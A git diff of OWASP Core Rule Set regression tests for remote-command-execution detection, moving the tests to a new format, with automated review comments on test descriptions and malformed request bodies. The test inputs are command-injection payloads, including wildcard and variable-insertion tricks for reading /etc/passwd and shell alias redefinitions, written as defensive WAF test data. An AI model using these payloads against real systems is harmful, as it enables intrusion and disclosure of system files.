dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias alias='curl'&letter google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 6 desc: "Test for alias value with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias double="curl""e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias double="curl""e google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 7 desc: "Negative test alias" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" + 
version: HTTP/1.1 + output: + log: + no_expect_ids: [932175] + - test_id: 8 desc: "Negative test alias with quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." + version: HTTP/1.1 + output: + log: + no_expect_ids: [932175] + - test_id: 9 desc: "Status Page Test - Test for simple alias example" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20a=b" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20a=b" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 10 desc: "Test for alias with -p argument" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -p jzfrx=id - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -p jzfrx=id + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 11 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -gmr a=b - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -gmr a=b + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 12 desc: | Test for alias with zsh '+' flags. 
Payload: "alias +m a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 13 desc: | Test for alias with trailing '+' in a flag. Payload: "alias +g+ a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 14 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ls-al='ls -al' - version: HTTP/1.1 - output: - 
log_contains: id "932175" - - test_title: 932175-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ls-al='ls -al' + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 15 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ..='cd ..' - version: HTTP/1.1 - output: - log_contains: id "932175" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ..='cd ..' + version: HTTP/1.1 + output: + log: + expect_ids: [932175] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml index 5784dde62..fa512935b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml 
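Review bot: The `desc:` for tests 14 and 15 reads "Test for alias with zsh flags", but the payloads `alias ls-al='ls -al'` and `alias ..='cd ..'` carry no flags at all — they exercise hyphen and dot characters in the alias name; `desc: "Test for alias name containing a hyphen"` and `desc: "Test for alias name consisting of dots"` would describe what is actually sent. In the negative tests 7 and 8 the body is wrapped in literal double quotes inside a `|` block scalar, so the POST body begins with `"text=` and ends with `"`: the quotes are transmitted and the argument name becomes `"text`; dropping them (`text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name`) makes the negative case match a real form submission. Test 1's description `"Test for 0FA9HCGT alias ..."` looks like a pasted artefact, and test 4's `curl"e google.com` / test 6's `"curl""e google.com` look truncated next to test 3's `curl&letter google.com`; worth checking they are the intended payloads before they are frozen in the new format.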
@@ -2,82 +2,81 @@ meta: author: "Franziska Bühler, azurit" description: "Restricted File Upload Attempt" - enabled: true - name: 932180.yaml +rule_id: 932180 tests: - - test_title: 932180-1 + - test_id: 1 desc: "Test file upload with request header X-Filename and filename settings.php" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - X-Filename: settings.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932180" - - test_title: 932180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + X-Filename: settings.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932180] + - test_id: 2 desc: "Test file upload with multipart/form-data and filename config.yml" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="config"; filename="config.yml" - Content-Type: text/yaml + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; 
boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="config"; filename="config.yml" + Content-Type: text/yaml - ... Some content ... - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.png" - Content-Type: image/png + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.png" + Content-Type: image/png - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - output: - log_contains: id "932180" - - test_title: 932180-3 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + output: + log: + expect_ids: [932180] + - test_id: 3 desc: "File upload - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.jpg" - Content-Type: image/jpeg + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.jpg" + Content-Type: image/jpeg - ... Some content ... 
- ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - BINARYDATA - --0000-- - output: - no_log_contains: id "932180" + BINARYDATA + --0000-- + output: + log: + no_expect_ids: [932180] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml index bb7f0da09..2e2b5ae9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml 
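Review bot: In negative test 3 the multipart body closes with `--0000--` although the declared boundary is `----WebKitFormBoundaryABCDEFGIJKLMNOPQ`, and the second part after the middle boundary has no `Content-Disposition` header at all. If the engine under test runs multipart strict validation (the `REQBODY_ERROR` / `MULTIPART_STRICT_ERROR` checks from the recommended ModSecurity config) with a denying action, the request may be rejected in phase 2 before 932180 is ever evaluated, and `no_expect_ids: [932180]` then passes for the wrong reason rather than proving that a `.jpg` upload is allowed. Closing with `------WebKitFormBoundaryABCDEFGIJKLMNOPQ--` and giving the second part `Content-Disposition: form-data; name="image2"; filename="test2.jpg"` plus `Content-Type: image/jpeg` keeps the body well-formed so the rule is actually exercised; the first two tests already use a correctly terminated body and can serve as the template.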
@@ -2,112 +2,111 @@ meta: author: "Franziska Bühler, Max Leske, azurit" description: "Remote Command Execution: Wildcard bypass technique attempt" - enabled: true - name: 932190.yaml +rule_id: 932190 tests: - - test_title: 932190-1 + - test_id: 1 desc: "Match wild card evasion in 'cat+/et*/*wd'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2Fet*%2F*wd" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2Fet*%2F*wd" + version: HTTP/1.0 + output: + log: + expect_ids: [932190] + - test_id: 2 desc: "Match wild card evasion in 'cat+/ET*/*WD'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2FET*%2F*WD" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2FET*%2F*WD" + version: HTTP/1.0 + output: + log: + expect_ids: [932190] + - test_id: 3 desc: "Match wild card evasion in '/???/?s'" stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" + version: HTTP/1.0 + output: + log: + expect_ids: [932190] + - test_id: 4 desc: "No FP in 'Does the * shine bright?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" - version: HTTP/1.0 - output: - no_log_contains: id "932190" - - test_title: 932190-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932190] + - test_id: 5 desc: "Handle single quote evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" 
- version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" - output: - log_contains: id "932190" - - test_title: 932190-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" + output: + log: + expect_ids: [932190] + - test_id: 6 desc: "Handle backslash evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" - output: - log_contains: id "932190" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" + output: + log: + expect_ids: [932190] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index ba760012d..3f125fc35 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml 
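Review bot: The `Accept:` header value in every stage of this file is left as an unquoted plain scalar (`Accept: text/xml,...,*/*;q=0.5`), while the sibling test files migrated in the same commit (932200, 932205, 932206) quote the identical value. It parses correctly as written, since the scalar neither starts with an indicator nor contains `: ` or ` #`, so this is a style point only; quoting it as `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"` keeps the migrated corpus uniform and protects against a later edit that moves `*` to the front of the value.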
@@ -2,265 +2,264 @@ meta: author: "theMiddle, Franziska Bühler, Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932200.yaml +rule_id: 932200 tests: - - test_title: 932200-1 + - test_id: 1 desc: globbing patterns stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 2 desc: uninitialized variable stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 3 desc: bash function stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost 
- User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 4 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 5 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 6 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 7 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 8 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 9 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 10 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" - version: HTTP/1.0 - output: - 